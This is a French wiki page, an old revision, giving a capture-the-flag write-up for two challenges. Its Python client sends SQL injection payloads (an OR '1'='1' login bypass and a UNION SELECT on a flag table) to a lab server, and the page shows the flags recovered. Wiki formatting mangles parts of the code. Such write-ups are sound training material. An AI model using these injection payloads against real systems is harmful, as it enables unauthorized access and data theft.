Outils d'utilisateurs

Outils du Site


ctf_mssis_ctf

Ceci est une ancienne révision du document !


Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !

Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 … Welcome on level 2 !

Citation #123 union SELECT * fROM flag:

ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py #encoding: utf-8 import socket import sys # change this if needed HOST = '192.168.1.19' # change this if needed IP = 8096 def create_socket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) s.connect1) except Exception as e: print(“Can't open socket !”) print(e) sys.exit(1) return s def test_level1(): print(”[+] Test level1 …”) s = create_socket() login = 'admin” OR “1”=“1' password = 'toto” OR “1”=“1” LIMIT “1” OFFSET “2' cmd = “\x01%s\x00%s” % (login,password) s.send(cmd.encode('utf-8')) msg = s.recv(1024) if msg and msg.decode('utf-8').startswith(“Welcome”): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print(“If you called a valid level, notice an admin”) s.close() def test_level2(): print(”[+] Test level2 …”) s = create_socket() citation = '123 union SELECT * fROM flag' s.send(b”\x02%s” % (citation)) msg = s.recv(1024) if msg and msg.decode('utf-8').startswith(“Welcome”): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print(“If you called a valid level, notice an admin”) s.close() if name == 'main': test_level1() print(””) test_level2()

1) HOST,IP
ctf_mssis_ctf.1526204943.txt.gz · Dernière modification: 2018/05/13 11:49 par M0N5T3R